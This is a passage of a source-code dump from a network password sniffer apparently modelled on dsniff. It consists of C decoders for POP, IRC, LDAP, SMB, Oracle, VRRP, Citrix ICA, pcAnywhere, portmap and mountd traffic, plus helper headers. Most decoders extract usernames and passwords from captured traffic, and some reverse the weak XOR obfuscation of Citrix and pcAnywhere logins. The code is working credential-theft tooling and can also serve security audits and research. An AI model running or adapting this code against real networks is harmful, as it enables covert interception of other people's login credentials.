*/ 16 | 17 | #include "config.h" 18 | 19 | #include 20 | 21 | #include 22 | #include 23 | 24 | #include "buf.h" 25 | #include "decode.h" 26 | 27 | static u_char ica_magic[] = { 0x32, 0x26, 0x85, 0x92, 0x58 }; 28 | 29 | int 30 | decode_citrix(u_char *buf, int len, u_char *obuf, int olen) 31 | { 32 | struct buf inbuf, outbuf; 33 | u_char key, c, t[2]; 34 | int i; 35 | 36 | buf_init(&inbuf, buf, len); 37 | buf_init(&outbuf, obuf, olen); 38 | 39 | while ((i = buf_index(&inbuf, ica_magic, sizeof(ica_magic))) >= 0) { 40 | buf_skip(&inbuf, i); 41 | 42 | if (buf_len(&inbuf) < 60) 43 | break; 44 | 45 | buf_skip(&inbuf, 17); 46 | 47 | if (buf_get(&inbuf, &key, 1) != 1) 48 | break; 49 | 50 | buf_skip(&inbuf, 42); 51 | 52 | if (buf_get(&inbuf, &c, 1) != 1) 53 | break; 54 | 55 | c ^= ('C' | key); 56 | 57 | buf_put(&outbuf, &c, 1); 58 | 59 | i = 0; 60 | while (buf_get(&inbuf, t, 2) == 2) { 61 | c = t[0] ^ t[1] ^ key; 62 | 63 | if (c == '\0') { 64 | buf_put(&outbuf, "\n", 1); 65 | if (++i > 2) break; 66 | } 67 | buf_put(&outbuf, &c, 1); 68 | } 69 | } 70 | buf_end(&outbuf); 71 | 72 | return (buf_len(&outbuf)); 73 | } 74 | -------------------------------------------------------------------------------- /ssh.h: -------------------------------------------------------------------------------- 1 | /* 2 | * ssh.h 3 | * 4 | * Minimal SSH-1 protocol implementation. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: ssh.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef SSH_H 12 | #define SSH_H 13 | 14 | #define SSH_MAX_PADLEN 8 15 | #define SSH_MAX_PKTLEN 262144 16 | 17 | /* Authentication types. */ 18 | #define SSH_AUTH_PASSWORD 3 19 | 20 | /* Cipher types. */ 21 | #define SSH_CIPHER_NONE 0 22 | #define SSH_CIPHER_3DES 3 23 | #define SSH_CIPHER_BLOWFISH 6 24 | 25 | /* Message types. */ 26 | #define SSH_MSG_DISCONNECT 1 27 | #define SSH_SMSG_PUBLIC_KEY 2 28 | #define SSH_CMSG_SESSION_KEY 3 29 | #define SSH_CMSG_USER 4 30 | #define SSH_CMSG_AUTH_PASSWORD 9 31 | #define SSH_SMSG_SUCCESS 14 32 | #define SSH_SMSG_FAILURE 15 33 | #define SSH_CMSG_STDIN_DATA 16 34 | #define SSH_SMSG_STDOUT_DATA 17 35 | #define SSH_SMSG_STDERR_DATA 18 36 | #define SSH_SMSG_EXITSTATUS 20 37 | 38 | typedef struct ssh_ctx { 39 | int authmask; 40 | int encmask; 41 | RSA *servkey; 42 | RSA *hostkey; 43 | } SSH_CTX; 44 | 45 | typedef struct ssh { 46 | int fd; 47 | SSH_CTX *ctx; 48 | u_char sesskey[32]; 49 | void *estate; 50 | void *dstate; 51 | void (*encrypt)(u_char *src, u_char *dst, int len, void *state); 52 | void (*decrypt)(u_char *src, u_char *dst, int len, void *state); 53 | } SSH; 54 | 55 | void SSH_init(void); 56 | 57 | SSH_CTX *SSH_CTX_new(void); 58 | 59 | SSH *SSH_new(SSH_CTX *ctx); 60 | 61 | void SSH_set_fd(SSH *ssh, int fd); 62 | 63 | int SSH_accept(SSH *ssh); 64 | 65 | int SSH_connect(SSH *ssh); 66 | 67 | int SSH_recv(SSH *ssh, u_char *buf, int size); 68 | 69 | int SSH_send(SSH *ssh, u_char *buf, int len); 70 | 71 | void SSH_close(SSH *ssh); 72 | 73 | #endif /* SSH_H */ 74 | -------------------------------------------------------------------------------- /decode_oracle.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_oracle.c 3 | * 4 | * Oracle SQL*Net v2/Net8. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_oracle.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "decode.h" 19 | 20 | /* XXX - dag nasty. anyone have protocol specs? */ 21 | int 22 | decode_oracle(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | u_char *p, *q; 25 | u_short i, j; 26 | int gotauth = 0; 27 | 28 | p = buf; 29 | 30 | i = pntohs(p); 31 | if (i >= len) return (0); 32 | 33 | if (i < 60) { /* XXX - skip unknown "empty" packet */ 34 | p += i; 35 | i = pntohs(p); 36 | if (p + i > buf + len) return (0); 37 | } 38 | /* Save TNS connect string. */ 39 | p[i] = '\0'; 40 | for (q = p + i; q > p && q[-1] != '\0'; q--) 41 | ; 42 | snprintf(obuf, olen, "%s\n", q); 43 | p += i; 44 | 45 | /* XXX - skip initial username message. */ 46 | if ((p = bufbuf(p, len, "(TNS V", 6)) == NULL) return (0); 47 | if ((i = len - (p - buf)) <= 0) return (0); 48 | if ((p = memchr(p, ')', i)) == NULL) return (0); 49 | 50 | /* Parse auth messages. */ 51 | for (p++; p - buf < len; p += i) { 52 | i = pntohs(p); 53 | if (p + i > buf + len || i < 120) 54 | break; 55 | 56 | if (memcmp(p + 4, "\x06\x00\x00\x00\x00\x00\x03\x3a", 8) != 0) 57 | continue; 58 | 59 | for (q = p + i; q > p && q[-1] != '\0'; q--) 60 | ; 61 | j = pntohs(p + 19); 62 | if (q + j > buf + len) 63 | return (0); 64 | q[j] = '\0'; 65 | 66 | j = strlen(obuf); 67 | snprintf(obuf + j, olen + j, "%s\n", p + 117); 68 | gotauth++; 69 | } 70 | return (gotauth ? strlen(obuf) : 0); 71 | } 72 | -------------------------------------------------------------------------------- /decode_vrrp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_vrrp.c 3 | * 4 | * Virtual Router Redundancy Protocol. 5 | * 6 | * Copyright (c) 2000 Eric Jackson 7 | * Copyright (c) 2000 Dug Song 8 | * 9 | * $Id: decode_vrrp.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ 10 | */ 11 | 12 | #include "config.h" 13 | 14 | #include 15 | 16 | #include 17 | #include 18 | 19 | #include "buf.h" 20 | #include "decode.h" 21 | 22 | struct vrrp_header { 23 | u_char vr_vers; /* Version */ 24 | u_char vr_vrid; /* Virtual Router ID */ 25 | u_char vr_prio; /* Router Priority */ 26 | u_char vr_naddr; /* # of addresses */ 27 | u_char vr_auth; /* Type of Authentication */ 28 | u_char vr_advr; /* ADVERTISEMENT Interval */ 29 | u_short vr_cksum; /* Checksum */ 30 | /* vr_naddr * 4 # of addresses */ 31 | }; 32 | #define VRRP_AUTH_NONE 0 33 | #define VRRP_AUTH_SIMPLE 1 34 | #define VRRP_AUTH_AH 2 35 | 36 | #define VRRP_AUTH_DATA_LEN 8 37 | 38 | int 39 | decode_vrrp(u_char *buf, int len, u_char *obuf, int olen) 40 | { 41 | struct buf *b, inbuf, outbuf; 42 | struct vrrp_header *vrrp; 43 | 44 | buf_init(&inbuf, buf, len); 45 | buf_init(&outbuf, obuf, olen); 46 | 47 | vrrp = (struct vrrp_header *)buf_ptr(&inbuf); 48 | 49 | if (buf_len(&inbuf) < sizeof(*vrrp)) 50 | return (0); 51 | 52 | /* We only care about VRRP_AUTH_SIMPLE */ 53 | if (ntohs(vrrp->vr_auth) != VRRP_AUTH_SIMPLE) 54 | return (0); 55 | 56 | /* XXX - probably want to verify checksum */ 57 | 58 | /* Forward to Authentication Data */ 59 | buf_skip(&inbuf, sizeof(*vrrp) + 8 + (vrrp->vr_naddr * 4)); 60 | 61 | if ((b = buf_tok(&inbuf, NULL, VRRP_AUTH_DATA_LEN)) == NULL) 62 | return (0); 63 | 64 | buf_put(&outbuf, buf_ptr(b), buf_len(b)); 65 | buf_put(&outbuf, "\n", 1); 66 | buf_end(&outbuf); 67 | 68 | return (buf_len(&outbuf)); 69 | } 70 | -------------------------------------------------------------------------------- /hex.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hex.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: hex.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | #include "hex.h" 18 | 19 | int 20 | hex_decode(char *src, int srclen, u_char *dst, int dstlen) 21 | { 22 | char *p, *pe; 23 | u_char *q, *qe, ch, cl; 24 | 25 | pe = src + srclen; 26 | qe = dst + dstlen; 27 | 28 | if (strncmp(src, "0x", 2) == 0) 29 | src += 2; 30 | 31 | for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) { 32 | ch = tolower(p[0]); 33 | cl = tolower(p[1]); 34 | 35 | if ((ch >= '0') && (ch <= '9')) ch -= '0'; 36 | else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10; 37 | else return (-1); 38 | 39 | if ((cl >= '0') && (cl <= '9')) cl -= '0'; 40 | else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10; 41 | else return (-1); 42 | 43 | *q++ = (ch << 4) | cl; 44 | } 45 | return (q - dst); 46 | } 47 | 48 | /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ 49 | void 50 | hex_print(const u_char *buf, int len, int offset) 51 | { 52 | u_int i, j, jm; 53 | int c; 54 | 55 | printf("\n"); 56 | for (i = 0; i < len; i += 0x10) { 57 | printf(" %04x: ", (u_int)(i + offset)); 58 | jm = len - i; 59 | jm = jm > 16 ? 16 : jm; 60 | 61 | for (j = 0; j < jm; j++) { 62 | if ((j % 2) == 1) printf("%02x ", (u_int) buf[i+j]); 63 | else printf("%02x", (u_int) buf[i+j]); 64 | } 65 | for (; j < 16; j++) { 66 | if ((j % 2) == 1) printf(" "); 67 | else printf(" "); 68 | } 69 | printf(" "); 70 | 71 | for (j = 0; j < jm; j++) { 72 | c = buf[i+j]; 73 | c = isprint(c) ? c : '.'; 74 | printf("%c", c); 75 | } 76 | printf("\n"); 77 | } 78 | } 79 | 80 | -------------------------------------------------------------------------------- /missing/libgen.h: -------------------------------------------------------------------------------- 1 | /* 2 | * libgen.h 3 | * 4 | * Adapted from OpenBSD libc *err* *warn* code. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * Copyright (c) 1997 Todd C. Miller 9 | * All rights reserved. 10 | * 11 | * Redistribution and use in source and binary forms, with or without 12 | * modification, are permitted provided that the following conditions 13 | * are met: 14 | * 1. Redistributions of source code must retain the above copyright 15 | * notice, this list of conditions and the following disclaimer. 16 | * 2. Redistributions in binary form must reproduce the above copyright 17 | * notice, this list of conditions and the following disclaimer in the 18 | * documentation and/or other materials provided with the distribution. 19 | * 3. The name of the author may not be used to endorse or promote products 20 | * derived from this software without specific prior written permission. 21 | * 22 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 23 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 24 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 25 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 26 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 27 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 28 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 29 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 30 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 31 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 32 | */ 33 | 34 | #ifndef _LIBGEN_H_ 35 | #define _LIBGEN_H_ 36 | 37 | char *basename(const char *); 38 | char *dirname(const char *); 39 | 40 | #endif /* _LIBGEN_H_ */ 41 | -------------------------------------------------------------------------------- /decode_portmap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_portmap.c 3 | * 4 | * RPC portmap. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_portmap.c,v 1.8 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #include "rpc.h" 23 | #include "trigger.h" 24 | #include "decode.h" 25 | 26 | int 27 | decode_portmap(u_char *buf, int len, u_char *obuf, int olen) 28 | { 29 | XDR xdrs; 30 | struct rpc_msg msg; 31 | struct pmap *pm, pmap; 32 | struct xid_map *xm; 33 | int hdrlen; 34 | 35 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 36 | return (0); 37 | 38 | if (msg.rm_direction == CALL && 39 | msg.rm_call.cb_prog == PMAPPROG && 40 | msg.rm_call.cb_proc == PMAPPROC_GETPORT) { 41 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 42 | if (xdr_pmap(&xdrs, &pmap)) { 43 | if ((pm = malloc(sizeof(*pm))) != NULL) { 44 | *pm = pmap; 45 | xid_map_enter(msg.rm_xid, PMAPPROG, PMAPVERS, 46 | PMAPPROC_GETPORT, (void *) pm); 47 | } 48 | } 49 | xdr_destroy(&xdrs); 50 | } 51 | else if (msg.rm_direction == REPLY && 52 | (xm = xid_map_find(msg.rm_xid)) != NULL) { 53 | if (msg.rm_reply.rp_stat == MSG_ACCEPTED && 54 | msg.acpted_rply.ar_stat == SUCCESS) { 55 | pm = (struct pmap *)xm->data; 56 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, 57 | XDR_DECODE); 58 | if (xdr_u_long(&xdrs, &pm->pm_port)) { 59 | trigger_rpc(pm->pm_prog, pm->pm_prot, 60 | pm->pm_port); 61 | trigger_rpc(pm->pm_prog, pm->pm_prot, 62 | 0 - (int) pm->pm_port); 63 | } 64 | xdr_destroy(&xdrs); 65 | } 66 | free(xm->data); 67 | memset(xm, 0, sizeof(*xm)); 68 | } 69 | return (0); 70 | } 71 | -------------------------------------------------------------------------------- /decode_pop.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_pop.c 3 | * 4 | * Post Office Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_pop.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "base64.h" 19 | #include "options.h" 20 | #include "decode.h" 21 | 22 | int 23 | decode_poppass(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | char *p; 26 | 27 | obuf[0] = '\0'; 28 | 29 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 30 | if (strncasecmp(p, "user ", 5) == 0 || 31 | strncasecmp(p, "pass ", 5) == 0 || 32 | strncasecmp(p, "newpass ", 8) == 0) { 33 | strlcat(obuf, p, olen); 34 | strlcat(obuf, "\n", olen); 35 | } 36 | } 37 | if (strip_lines(obuf, Opt_lines) < 3) 38 | return (0); 39 | 40 | return (strlen(obuf)); 41 | } 42 | 43 | int 44 | decode_pop(u_char *buf, int len, u_char *obuf, int olen) 45 | { 46 | char *p; 47 | int i, j; 48 | 49 | obuf[0] = '\0'; 50 | 51 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 52 | if (strncasecmp(p, "AUTH PLAIN", 10) == 0 || 53 | strncasecmp(p, "AUTH LOGIN", 10) == 0) { 54 | strlcat(obuf, p, olen); 55 | strlcat(obuf, "\n", olen); 56 | 57 | /* Decode SASL auth. */ 58 | for (i = 0; i < 2 && (p = strtok(NULL, "\r\n")); i++) { 59 | strlcat(obuf, p, olen); 60 | j = base64_pton(p, p, strlen(p)); 61 | p[j] = '\0'; 62 | strlcat(obuf, " [", olen); 63 | strlcat(obuf, p, olen); 64 | strlcat(obuf, "]\n", olen); 65 | } 66 | } 67 | /* Save regular POP2, POP3 auth info. */ 68 | else if (strncasecmp(p, "USER ", 5) == 0 || 69 | strncasecmp(p, "PASS ", 5) == 0 || 70 | strncasecmp(p, "HELO ", 5) == 0) { 71 | strlcat(obuf, p, olen); 72 | strlcat(obuf, "\n", olen); 73 | } 74 | } 75 | return (strlen(obuf)); 76 | } 77 | 78 | -------------------------------------------------------------------------------- /decode_irc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_irc.c 3 | * 4 | * Internet Relay Chat. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_irc.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "buf.h" 19 | #include "decode.h" 20 | 21 | int 22 | decode_irc(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | struct buf *line, inbuf, outbuf; 25 | int i, got_auth; 26 | 27 | buf_init(&inbuf, buf, len); 28 | buf_init(&outbuf, obuf, olen); 29 | got_auth = 0; 30 | 31 | while ((i = buf_index(&inbuf, "\n", 1)) != -1) { 32 | line = buf_tok(&inbuf, NULL, i); 33 | buf_skip(&inbuf, 1); 34 | 35 | if (i > 0 && line->base[i - 1] == '\r') 36 | line->end--; 37 | line->base[line->end] = '\0'; 38 | 39 | if (buf_cmp(&inbuf, ";", 1) == 0) { 40 | if ((i = buf_index(line, " ", 1)) < 0) 41 | continue; 42 | buf_skip(line, i + 1); 43 | } 44 | if (buf_cmp(line, "USER ", 5) == 0 || 45 | buf_cmp(line, "NICK ", 5) == 0) { 46 | buf_rewind(line); 47 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 48 | } 49 | else if (buf_cmp(line, "PASS ", 5) == 0 || 50 | buf_cmp(line, "OPER ", 5) == 0) { 51 | buf_rewind(line); 52 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 53 | got_auth = 1; 54 | } 55 | else if (buf_cmp(line, "MODE ", 5) == 0 && 56 | buf_index(line, " +k ", 4) != -1) { 57 | buf_rewind(line); 58 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 59 | got_auth = 1; 60 | } 61 | else if (buf_cmp(line, "JOIN ", 5) == 0) { 62 | buf_skip(line, 5); 63 | if ((i = buf_index(line, " ", 1)) < 0) 64 | continue; 65 | buf_skip(line, i + 1); 66 | if (buf_len(line) < 1) 67 | continue; 68 | buf_rewind(line); 69 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 70 | got_auth = 1; 71 | } 72 | } 73 | buf_end(&outbuf); 74 | 75 | return (got_auth ? buf_len(&outbuf) : 0); 76 | } 77 | -------------------------------------------------------------------------------- /decode_pcanywhere.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_pcanywhere.c 3 | * 4 | * Symantec pcAnywhere. 5 | * 6 | * Thanks to Pascal Longpre for his BUGTRAQ post 7 | * on pcAnywhere encryption, and for providing me with traffic traces. 8 | * 9 | * Copyright (c) 2000 Dug Song 10 | * 11 | * $Id: decode_pcanywhere.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $ 12 | */ 13 | 14 | #include "config.h" 15 | 16 | #include 17 | 18 | #include 19 | #include 20 | 21 | #include "buf.h" 22 | #include "decode.h" 23 | 24 | int 25 | decode_pcanywhere(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | struct buf *word, inbuf, outbuf; 28 | u_char *p, c; 29 | int i; 30 | 31 | buf_init(&inbuf, buf, len); 32 | buf_init(&outbuf, obuf, olen); 33 | 34 | /* Skip leading zero bytes. */ 35 | while (buf_get(&inbuf, &c, 1) == 1) { 36 | if (c != 0) break; 37 | } 38 | /* Version 7, no encryption */ 39 | if (c < 0x0f && c != 0x06 /* jic */) { 40 | while ((word = buf_tok(&inbuf, "\r", 1)) != NULL) { 41 | if (buf_ptr(word)[0] == 0x6f) 42 | break; 43 | buf_putf(&outbuf, "%.*s\n", 44 | buf_len(word), buf_ptr(word)); 45 | } 46 | } 47 | /* Version 9, encrypted */ 48 | else { 49 | /* Skip optional \x6f command packets. */ 50 | while ((i = buf_index(&inbuf, "\x06", 1)) >= 0) { 51 | buf_skip(&inbuf, i); 52 | if (buf_len(&inbuf) > 2 && buf_ptr(&inbuf)[1] != 0xff) 53 | break; 54 | buf_skip(&inbuf, 2); 55 | } 56 | /* Parse \x06 auth packets. */ 57 | while (buf_cmp(&inbuf, "\x06", 1) == 0) { 58 | buf_skip(&inbuf, 1); 59 | 60 | if (buf_get(&inbuf, &c, 1) != 1) 61 | break; 62 | 63 | if (buf_len(&inbuf) < c) 64 | break; 65 | 66 | p = buf_ptr(&inbuf); 67 | buf_skip(&inbuf, c); 68 | 69 | for (i = c - 1; i > 0; i--) { 70 | p[i] = p[i - 1] ^ p[i] ^ (i - 1); 71 | } 72 | p[0] ^= 0xab; 73 | 74 | buf_putf(&outbuf, "%.*s\n", c, p); 75 | } 76 | } 77 | buf_end(&outbuf); 78 | 79 | return (buf_len(&outbuf)); 80 | } 81 | 82 | -------------------------------------------------------------------------------- /decode_ldap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_ldap.c 3 | * 4 | * Lightweight Directory Access Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_ldap.c,v 1.5 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "buf.h" 19 | #include "asn1.h" 20 | #include "decode.h" 21 | 22 | int 23 | decode_ldap(u_char *buf, int len, u_char *obuf, int olen) 24 | { 25 | struct buf *msg, inbuf, outbuf; 26 | int i, type; 27 | u_char *p; 28 | 29 | buf_init(&inbuf, buf, len); 30 | buf_init(&outbuf, obuf, olen); 31 | 32 | while (buf_len(&inbuf) > 10) { 33 | /* LDAPMessage */ 34 | type = asn1_type(&inbuf); 35 | i = asn1_len(&inbuf); 36 | 37 | if (i <= 0 || (msg = buf_tok(&inbuf, NULL, i)) == NULL) 38 | break; 39 | 40 | if (type != ASN1_SEQUENCE) 41 | continue; 42 | 43 | /* messageID */ 44 | type = asn1_type(msg); 45 | i = asn1_len(msg); 46 | if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0) 47 | continue; 48 | 49 | /* bindRequest op - APPLICATION[0] SEQUENCE */ 50 | if (buf_cmp(msg, "\x60", 1) != 0) 51 | continue; 52 | asn1_type(msg); 53 | asn1_len(msg); 54 | 55 | /* version */ 56 | type = asn1_type(msg); 57 | i = asn1_len(msg); 58 | if (type != ASN1_INTEGER || i <= 0 || buf_skip(msg, i) < 0) 59 | continue; 60 | 61 | /* name */ 62 | type = asn1_type(msg); 63 | i = asn1_len(msg); 64 | p = buf_ptr(msg); 65 | if (type != ASN1_STRING || i <= 0 || buf_skip(msg, i) < 0) 66 | continue; 67 | 68 | /* simple auth [0] */ 69 | if (buf_cmp(msg, "\x80", 1) != 0) 70 | continue; 71 | *(buf_ptr(msg)) = '\0'; 72 | buf_skip(msg, 1); 73 | 74 | /* passwd */ 75 | i = asn1_len(msg); 76 | 77 | if (i <= 0 || i > buf_len(msg)) 78 | continue; 79 | 80 | if (buf_tell(&outbuf) > 0) 81 | buf_put(&outbuf, "\n", 1); 82 | buf_putf(&outbuf, "%s\n", p); 83 | buf_put(&outbuf, buf_ptr(msg), i); 84 | buf_put(&outbuf, "\n", 1); 85 | } 86 | buf_end(&outbuf); 87 | 88 | return (buf_len(&outbuf)); 89 | } 90 | 91 | -------------------------------------------------------------------------------- /decode_mountd.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_mountd.c 3 | * 4 | * RPC mountd. 5 | * 6 | * Outputs filehandle in nfsshell format. :-) 7 | * 8 | * Copyright (c) 2000 Dug Song 9 | * 10 | * $Id: decode_mountd.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include 20 | #include 21 | #include 22 | 23 | #include "buf.h" 24 | #include "mount.h" 25 | #include "rpc.h" 26 | #include "decode.h" 27 | 28 | int 29 | decode_mountd(u_char *buf, int len, u_char *obuf, int olen) 30 | { 31 | XDR xdrs; 32 | struct buf outbuf; 33 | struct rpc_msg msg; 34 | struct xid_map *xm; 35 | struct fhstatus fhstat; 36 | char *p, *dir; 37 | int i, hdrlen; 38 | 39 | buf_init(&outbuf, obuf, olen); 40 | 41 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 42 | return (0); 43 | 44 | if (msg.rm_direction == CALL && 45 | msg.rm_call.cb_prog == MOUNTPROG && 46 | msg.rm_call.cb_proc == MOUNTPROC_MNT) { 47 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 48 | dir = NULL; 49 | if (xdr_string(&xdrs, &dir, MAXPATHLEN)) { 50 | xid_map_enter(msg.rm_xid, MOUNTPROG, MOUNTVERS, 51 | MOUNTPROC_MNT, (void *) dir); 52 | } 53 | xdr_destroy(&xdrs); 54 | } 55 | else if (msg.rm_direction == REPLY && 56 | (xm = xid_map_find(msg.rm_xid)) != NULL) { 57 | if (msg.rm_reply.rp_stat == MSG_ACCEPTED && 58 | msg.acpted_rply.ar_stat == SUCCESS) { 59 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, 60 | XDR_DECODE); 61 | if (xdr_fhstatus(&xdrs, &fhstat)) { 62 | if (fhstat.fhs_status == 0) { 63 | buf_putf(&outbuf, "%s [", 64 | (char *)xm->data); 65 | 66 | p = fhstat.fhstatus_u.fhs_fhandle; 67 | 68 | for (i = 0; i < FHSIZE; i++) { 69 | buf_putf(&outbuf, "%.2x ", 70 | p[i] & 0xff); 71 | } 72 | buf_put(&outbuf, "]\n", 2); 73 | } 74 | } 75 | xdr_destroy(&xdrs); 76 | } 77 | free(xm->data); 78 | memset(xm, 0, sizeof(*xm)); 79 | } 80 | buf_end(&outbuf); 81 | 82 | return (buf_len(&outbuf)); 83 | } 84 | -------------------------------------------------------------------------------- /decode_smb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_smb.c 3 | * 4 | * Microsoft Server Message Block. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_smb.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | 16 | #include 17 | #include 18 | 19 | #include "decode.h" 20 | 21 | struct smbhdr { 22 | u_char proto[4]; 23 | u_char cmd; 24 | u_char err[4]; 25 | u_char flags1; 26 | u_short flags2; 27 | u_short pad[6]; 28 | u_short tid, pid, uid, mid; 29 | }; 30 | 31 | int 32 | decode_smb(u_char *buf, int len, u_char *obuf, int olen) 33 | { 34 | struct smbhdr *smb; 35 | int i, j, k; 36 | u_char *p, *q, *end; 37 | char *user, *pass; 38 | 39 | obuf[0] = '\0'; 40 | 41 | /* Skip NetBIOS session request. */ 42 | if (len < 4 || buf[0] != 0x81) return (0); 43 | buf += 2; 44 | GETSHORT(i, buf); len -= 4; 45 | if (len < i) return (0); 46 | buf += i; len -= i; 47 | end = buf + len; 48 | 49 | /* Parse SMBs. */ 50 | for (p = buf; p < end; p += i) { 51 | GETLONG(i, p); 52 | if (i > end - p || i < sizeof(*smb) + 32) 53 | continue; 54 | 55 | smb = (struct smbhdr *)p; 56 | if (memcmp(smb->proto, "\xffSMB", 4) != 0 || smb->cmd != 0x73) 57 | continue; 58 | 59 | user = pass = NULL; 60 | q = (u_char *)(smb + 1); 61 | 62 | if (*q == 10) { /* Pre NT LM 0.12 */ 63 | q += 15; j = pletohs(q); q += 2; 64 | if (j > i - (sizeof(*smb) + 15 + 6)) 65 | continue; 66 | pass = q + 6; 67 | user = pass + j; 68 | } 69 | else if (*q == 13) { /* NT LM 0.12 */ 70 | q += 15; j = pletohs(q); 71 | q += 2; k = pletohs(q); 72 | if (j > i - ((q - p) + 12) || k > i - ((q - p) + 11)) 73 | continue; 74 | pass = q + 12; 75 | user = pass + j + k; 76 | } 77 | else continue; 78 | 79 | /* XXX - skip null IPC sessions, etc. */ 80 | if (user && pass && strlen(user) && 81 | is_ascii_string(pass, j - 1)) { 82 | strlcat(obuf, user, olen); 83 | strlcat(obuf, " ", olen); 84 | strlcat(obuf, pass, olen); 85 | strlcat(obuf, "\n", olen); 86 | } 87 | } 88 | return (strlen(obuf)); 89 | } 90 | 91 | -------------------------------------------------------------------------------- /buf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * buf.h 3 | * 4 | * Buffer manipulation routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: buf.h,v 1.6 2001/03/15 08:33:05 dugsong Exp $ 9 | */ 10 | 11 | #ifndef BUF_H 12 | #define BUF_H 13 | 14 | typedef struct buf { 15 | u_char *base; 16 | int size; 17 | int offset; 18 | int end; 19 | } *buf_t; 20 | 21 | /* Initialize buffer. */ 22 | void buf_init(buf_t buf, u_char *data, int len); 23 | 24 | /* Allocate buffer. */ 25 | buf_t buf_new(int size); 26 | 27 | /* Free buffer. */ 28 | void buf_free(buf_t buf); 29 | 30 | /* Return pointer to buffer data. */ 31 | #define buf_ptr(b) ((b)->base + (b)->offset) 32 | 33 | /* Return length of buffer data. */ 34 | #define buf_len(b) ((b)->end - (b)->offset) 35 | 36 | /* Return remaining length of unused buffer. */ 37 | #define buf_left(b) ((b)->size - (b)->offset) 38 | 39 | /* Return size of buffer. */ 40 